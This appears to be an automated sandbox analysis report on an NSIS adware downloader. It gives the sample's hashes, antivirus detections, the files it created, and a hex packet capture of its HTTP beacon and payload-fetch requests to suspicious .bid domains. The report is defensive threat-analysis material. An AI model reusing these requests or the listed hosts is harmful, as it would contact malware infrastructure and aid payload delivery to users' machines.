Analysis Date2018-04-09 08:25:35
MD5adad60d1cb58bf9de083f07d5b4c7a2a
SHA103ca7fb1776a3d3539969ee040a5c9a2478df28c

Static Details:

AVArcabit (arcavir)Trojan.Generic.22891081
AVAuthentiumNo Virus
AVGrisoft (avg)Error Scanning File
AVAvira (antivir)TR/Adload.Gen
AVAlwil (avast)Adware-gen [Adw]
AVAlwil (avast)Downloader-WHL [Trj]
AVAd-AwareTrojan.Generic.22891081
AVBitDefenderTrojan.Generic.22891081
AVBullGuardError Scanning File
AVClamAVError Scanning File
AVDr. WebTrojan.AdLoad.86
AVEmsisoftTrojan.Generic.22891081
AVMicroWorld (escan)No Virus
AVCA (E-Trust Ino)Error Scanning File
AVFortinetError Scanning File
AVFrisk (f-prot)Error Scanning File
AVF-SecureTrojan.Generic.22891081
AVIkarusError Scanning File
AVK7Trojan-Downloader ( 005235fd1 )
AVKasperskyError Scanning File
AVMalwareBytesTrojan.Dropper.NSIS
AVMcafeeNo Virus
AVMicrosoft Security EssentialsNo Virus
AVNANOTrojan.Nsis.Adload.etdhkj
AVNANOTrojan.Nsis.Adload.etdkln
AVEset (nod32)NSIS/TrojanDownloader.Adload.R
AVPadvishNo Virus
AVCAT (quickheal)Trojan.IGENERIC
AVRisingError Scanning File
AV360 SafeNo Virus
AVSUPERAntiSpywareNo Virus
AVSymantecNo Virus
AVTrend MicroTROJ_GE.90B3242F
AVTwisterTrojanDldr.Adload.R.igap.arc
AVVirusBlokAda (vba32)TrojanDownloader.AdLoad
AVWindows DefenderNo Virus
AVZillya!Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\03ca7fb1776a3d3539969ee040a5c9a2478df28c.exe

Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates FileC:\
Creates FileC:\Users\Phil\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates FileC:\Users\Phil\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000001.db
Creates FileC:\Users\desktop.ini
Creates FileC:\Users
Creates FileC:\Users\Phil
Creates FileC:\Users\Phil\AppData
Creates FileC:\Users\Phil\AppData\Local
Creates FileC:\Users\Phil\Desktop\desktop.ini
Creates Mutex
Creates Mutex

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   47455420 2f6c6175 6e63685f 76352e70   GET /launch_v5.p
0x00000010 (00016)   68703f70 3d267069 643d3237 35332674   hp?p=&pid=2753&t
0x00000020 (00032)   69643d31 30383336 35313826 625f7479   id=10836518&b_ty
0x00000030 (00048)   703d7065 266e3d56 484a7661 6d46754a   p=pe&n=VHJvamFuJ
0x00000040 (00064)   5449314d 6a557951 6c4a6c62 5739325a   TI1MjUyQlJlbW92Z
0x00000050 (00080)   58496c4d 6a55794e 544a434e 69343526   XIlMjUyNTJCNi45&
0x00000060 (00096)   7265623d 31266963 3d204854 54502f31   reb=1&ic= HTTP/1
0x00000070 (00112)   2e300d0a 486f7374 3a206275 6e2e7761   .0..Host: bun.wa
0x00000080 (00128)   72737061 64652e62 69640d0a 55736572   rspade.bid..User
0x00000090 (00144)   2d416765 6e743a20 4e534953 444c2f31   -Agent: NSISDL/1
0x000000a0 (00160)   2e322028 4d6f7a69 6c6c6129 0d0a4163   .2 (Mozilla)..Ac
0x000000b0 (00176)   63657074 3a202a2f 2a0d0a0d 0a         cept: */*....

0x00000000 (00000)   47455420 2f657272 6f722e70 68703f73   GET /error.php?s
0x00000010 (00016)   7472696e 673d5a6d 46305957 77734e69   tring=ZmF0YWwsNi
0x00000020 (00032)   78756279 42696457 356b6247 567a4c43   xubyBidW5kbGVzLC
0x00000030 (00048)   7773636d 383d2048 5454502f 312e300d   wscm8= HTTP/1.0.
0x00000040 (00064)   0a486f73 743a2074 72756d70 2e776172   .Host: trump.war
0x00000050 (00080)   6375702e 6269640d 0a557365 722d4167   cup.bid..User-Ag
0x00000060 (00096)   656e743a 204e5349 53444c2f 312e3220   ent: NSISDL/1.2 
0x00000070 (00112)   284d6f7a 696c6c61 290d0a41 63636570   (Mozilla)..Accep
0x00000080 (00128)   743a202a 2f2a0d0a 0d0a0d0a 55736572   t: */*......User
0x00000090 (00144)   2d416765 6e743a20 4e534953 444c2f31   -Agent: NSISDL/1
0x000000a0 (00160)   2e322028 4d6f7a69 6c6c6129 0d0a4163   .2 (Mozilla)..Ac
0x000000b0 (00176)   63657074 3a202a2f 2a0d0a0d 0a         cept: */*....


Strings